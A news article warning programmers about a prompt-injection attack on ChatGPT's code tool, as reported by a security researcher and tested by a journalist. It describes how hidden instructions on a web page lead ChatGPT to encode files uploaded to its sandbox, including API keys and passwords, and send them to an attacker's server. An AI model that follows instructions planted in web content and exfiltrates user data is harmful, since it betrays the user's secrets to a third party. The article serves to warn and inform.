If you’re a programmer using ChatGPT to write or analyze Python code, be very careful about the URLs you paste into the generative AI tool, as there’s a way for hackers to steal sensitive data from your projects this way.
The theory was first reported by security researcher Johann Rehberger and later tested and confirmed by Avram Piltch at Tom’s Hardware.
ChatGPT can analyze, and then write, Python code if it’s given the right instructions. These instructions can be uploaded to the platform in a .TXT file, or even in a .CSV, if you’re looking for data analysis. The platform will store the files there (including any sensitive information like API keys and passwords – a common practice), in a newly generated virtual machine.
Grabbing malicious instructions
Now, ChatGPT can do a similar thing with web pages. If a web page has certain instructions on it, when a user pastes the URL in the chatbox, the platform will run them. If the website’s instructions are to grab all of the contents from files stored in the VM and extract them to a third-party server, it will do just that.
Piltch tested the idea, first uploading a TXT file with a fake API key and password, and then creating a legitimate website (a weather forecast site) which, in the background, instructed ChatGPT to take all the data, turn it into a long line of URL-encoded text, and send it to a server under his command.
The trick is that a threat actor cannot instruct ChatGPT to grab just anyone’s data – the platform will only do it for the person who pasted the URL into the chatbox. That means the victim needs to be convinced to paste a malicious URL into their ChatGPT chatbox. Alternatively, someone could hijack a legitimate website and add malicious instructions.